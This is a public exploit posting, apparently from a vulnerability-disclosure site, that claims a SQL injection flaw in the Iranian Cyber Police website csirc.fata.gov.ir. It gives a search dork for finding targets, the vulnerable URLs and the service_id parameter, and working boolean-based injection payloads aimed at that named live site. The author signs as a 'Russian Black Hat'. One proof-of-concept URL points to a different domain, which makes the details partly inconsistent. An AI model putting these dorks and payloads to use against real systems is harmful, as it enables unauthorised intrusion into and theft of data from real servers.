Iranian Cyber Police "FATA.GOV.IR" has an SQL Injection vulnerability

2025.01.25
ir E1.Coders (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

This site belongs to the Iranian Cyber Police (پلیس فضای تولید و تبادل اطلاعات فراجا) (fata), which has a security problem with the SQL INJECTION Vulnerability "CWE-89". We have repeatedly reported to this site that it has a security problem and has ignored our report. We want to record this security issue ######################################################################################################################### # # # Exploit Title : "Iranian Cyber Police has an SQL Injection vulnerability." # # "Vulners AI Score: 7.8. Confidence level: High." # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : https://csirc.fata.gov.ir/ # # # # Security Risk : Medium # # # # Description : All target's IRanian Military websites # # # # DorK : ""inurl:/page/news-details?id=" "site:fata.gov.ir/page/news-details?id=" # # # ######################################################################################################################### # # # Expl0iTs: # # # # address (refer url): https://csirc.fata.gov.ir/page/news # # vulnerabillity : GET SQL INJECT BOOLEAN Based string # # action url: https://csirc.fata.gov.ir/page/news-details?id=100014%22 # action url: https://csirc.fata.gov.ir/page/news-details?id=%22100014 # action url: https://csirc.fata.gov.ir/page/news-details?id=100014%27 -------------------------------------------------- # # vuln type : SQLInjection # # refer address :https://csirc.fata.gov.ir/page/news-details?id=100014 # # request type : COOKIE # # action url : https://csirc.fata.gov.ir/page/news-details?id=100014 # parameter : service_id # # description : COOKIE SQL INJECTION BooleanBased String # # POC : https://csirc.fata.gov.ir/page/news-details?id=100014&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199 --------------------------------------- # vuln type : SQLInjection # # refer address : https://csirc.fata.gov.ir/page/news-details?id=100014 # # request type : GET # # action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 # # parameter : service_id # # description : GET SQL INJECTION BooleanBased Integer # # POC : https://csirc.fata.gov.ir/page/news-details?id=.&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end) # # # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # #########################################################################################################################


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top